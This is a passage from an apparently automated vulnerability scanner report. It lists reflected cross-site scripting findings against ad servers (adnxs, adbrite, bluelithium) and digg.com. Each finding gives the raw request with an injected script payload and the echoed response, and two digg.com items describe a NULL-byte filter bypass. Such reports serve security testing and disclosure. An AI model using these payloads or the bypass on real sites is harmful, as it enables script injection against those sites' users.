GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matched4bf'-alert(1)-'94e964e747d HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYAiACKAIw447n7QQQ447n7QQYAQ..; anj=Kfw))ByDuq(FJl:c9U(O<@CeVOmEXW1hL>#/*4Jn(uor=(5EBh5<W.k)Y><WiS:LOiybjU0r>wWIql]AvGq/IdS!acC(FaP$cYJ!J#h1Y$?7kmw?YIqgimiBWWi-dkyfpjFRO44ek(e!)zV^HsoI@m5(lVJ]-z44hi<@/+Gxw$#QV%Etka*a%eva$=@Au!AJSu6uj*@oO@]EL5n0EQo`R]:t/`eU_45K!c^VKH`O2$i'@`s.wMV-wH9)D=aab*.arK7xs@L$@.CbO?Kb?0ZuKR(FN+u4M#Er2:Iua<E_XvS:>yEy6m-9JBYXUm+V1/.@>oBLAQ/P^+8=*EjA[(GADvf*BbS#E1e?YTKA$'LPYDp0.fkASgZh0i(^P[N`AV7o.$d3BYa-u[VwBx:I(G/:381kcgHWoswb:=`Ku>u@Cidi%Y$u9`qSJ<7rlOS'j/U/>:p6qkC9x[=9>gzl!f)'vJRUdB!F`KgLFB[sgim_V^-4E!hC:TT[Mnnesvth<EqmD]T6X<+EXw*eL#7V._]eR7wKz#+Q<jY0)9m4.Ux(+g2x6gtKj2Uf7bK$d-7jQI=`H%cII=9QVL!LY6%gg!la[qizZ#JNdA3x'%jK#?C9j?>vs79'K>b2_7w$cAnjrNM]; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:13:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 31-Jul-2011 02:13:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 02:13:21 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/matched4bf'-alert(1)-'94e964e747d?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

7.11. http://ads.adbrite.com/adserver/vdi/682865 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5012f<script>alert(1)</script>20f68d8343f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/6828655012f<script>alert(1)</script>20f68d8343f?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:42:44 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/6828655012f<script>alert(1)</script>20f68d8343f

7.12. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The value of the r request parameter is copied into the HTML document as plain text between tags. The payload ff129<script>alert(1)</script>f0a7e8f2d2f was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /adserver/vdi/682865?d=null&r=ff129<script>alert(1)</script>f0a7e8f2d2f HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"

Response (redirected)

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:37:48 GMT
Server: XPEHb/1.0
Content-Length: 123

Unsupported URL: /adserver/vdi/ff129<script>alert(1)</script>f0a7e8f2d2fMTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY

7.13. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 698fa<script>alert(1)</script>fc949c569e7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/684339698fa<script>alert(1)</script>fc949c569e7?d=uuid%3D4d50384b-4b5e-0f67-919a-7275589c0b85 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"
Host: ads.adbrite.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:42:41 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/684339698fa<script>alert(1)</script>fc949c569e7

7.14. http://ads.adbrite.com/adserver/vdi/711384 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 537d5<script>alert(1)</script>eba3afc9f69 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/711384537d5<script>alert(1)</script>eba3afc9f69?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=4tv6lf&r=http%3A%2F%2Fa.triggit.com%2Fpxabcm%3Fabid%3D HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"; vsd=0@2@4dbe0f3a@loadus.exelator.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:13:08 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/711384537d5<script>alert(1)</script>eba3afc9f69

7.15. http://ads.adbrite.com/adserver/vdi/711384 [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The value of the r request parameter is copied into the HTML document as plain text between tags. The payload 59a9c<script>alert(1)</script>a841d9665e9 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /adserver/vdi/711384?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=4tv6lf&r=59a9c<script>alert(1)</script>a841d9665e9 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"; vsd=0@2@4dbe0f3a@loadus.exelator.com

Response (redirected)

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:06:50 GMT
Server: XPEHb/1.0
Content-Length: 120

Unsupported URL: /adserver/vdi/59a9c<script>alert(1)</script>a841d9665e9MTY4MzYyMDQ5eDAuMDQ5IDEzMDMwODM0NTB4NTQ0NjY5MDY4

7.16. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52007<script>alert(1)</script>c5f391e0619 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/76270152007<script>alert(1)</script>c5f391e0619?d=978972DFA063000D2C0E7A380BFA1DEC HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; b="%3A%3A12ggb%2C6e73"; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@2@4dbe115c@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:28:39 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/76270152007<script>alert(1)</script>c5f391e0619

7.17. http://ads.adbrite.com/adserver/vdi/779045 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/779045

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8c95c<script>alert(1)</script>c39d081d6c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/7790458c95c<script>alert(1)</script>c39d081d6c9?d=17608843913132534 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:43:06 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/7790458c95c<script>alert(1)</script>c39d081d6c9

7.18. http://ads.adbrite.com/adserver/vdi/806205 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/806205

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 171e1<script>alert(1)</script>9b1cb3d1ccd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/806205171e1<script>alert(1)</script>9b1cb3d1ccd?d=3728e74c-7461-11e0-9185-00259009a9e4&r=http%3A//d.chango.com/m/s/AdBrite%3Fpartner_uid%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs"; rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUipONEpJrDEszMlIS60xrDGoMSzNN1DSUUpKzMtLLcoEq1GqrQUA"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:46:00 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/806205171e1<script>alert(1)</script>9b1cb3d1ccd

7.19. http://ads.adbrite.com/adserver/vdi/806205 [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/806205

Issue detail

The value of the r request parameter is copied into the HTML document as plain text between tags. The payload c9203<script>alert(1)</script>12cc57e2eb0 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /adserver/vdi/806205?d=3728e74c-7461-11e0-9185-00259009a9e4&r=c9203<script>alert(1)</script>12cc57e2eb0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs"; rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUipONEpJrDEszMlIS60xrDGoMSzNN1DSUUpKzMtLLcoEq1GqrQUA"

Response (redirected)

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:40:30 GMT
Server: XPEHb/1.0
Content-Length: 123

Unsupported URL: /adserver/vdi/c9203<script>alert(1)</script>12cc57e2eb0MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY

7.20. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f436"-alert(1)-"09796207443 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=ad&ad_size=300x250&section=1521132&8f436"-alert(1)-"09796207443=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:10:11 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 02 May 2011 02:10:11 GMT
Pragma: no-cache
Content-Length: 4325
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ads.bluelithium.com/imp?8f436"-alert(1)-"09796207443=1&Z=300x250&s=1521132&_salt=2629575304";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A
...[SNIP]...

7.21. http://digg.com/tools/diggthis.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004206e"><script>alert(1)</script>8e049f903a4 was submitted in the REST URL parameter 1. This input was echoed as 4206e"><script>alert(1)</script>8e049f903a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /tools%004206e"><script>alert(1)</script>8e049f903a4/diggthis.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: digg.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:44:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-779404137262479208%3A203; expires=Tue, 03-May-2011 02:44:40 GMT; path=/; domain=digg.com
Set-Cookie: d=4613de18b6c542b61379940db09b5bbd6945796e3fc646c022194fedaff30823; expires=Sat, 01-May-2021 12:52:20 GMT; path=/; domain=.digg.com
X-Digg-Time: D=638324 10.2.129.49
Vary: Accept-Encoding
Cneonction: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16999

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/tools%004206e"><script>alert(1)</script>8e049f903a4/diggthis.js.rss">
...[SNIP]...

7.22. http://digg.com/tools/diggthis.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fac8d"><script>alert(1)</script>efc759f39a3 was submitted in the REST URL parameter 2. This input was echoed as fac8d"><script>alert(1)</script>efc759f39a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /tools/diggthis.js%00fac8d"><script>alert(1)</script>efc759f39a3 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: digg.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:44:56 GMT
Server: Apache
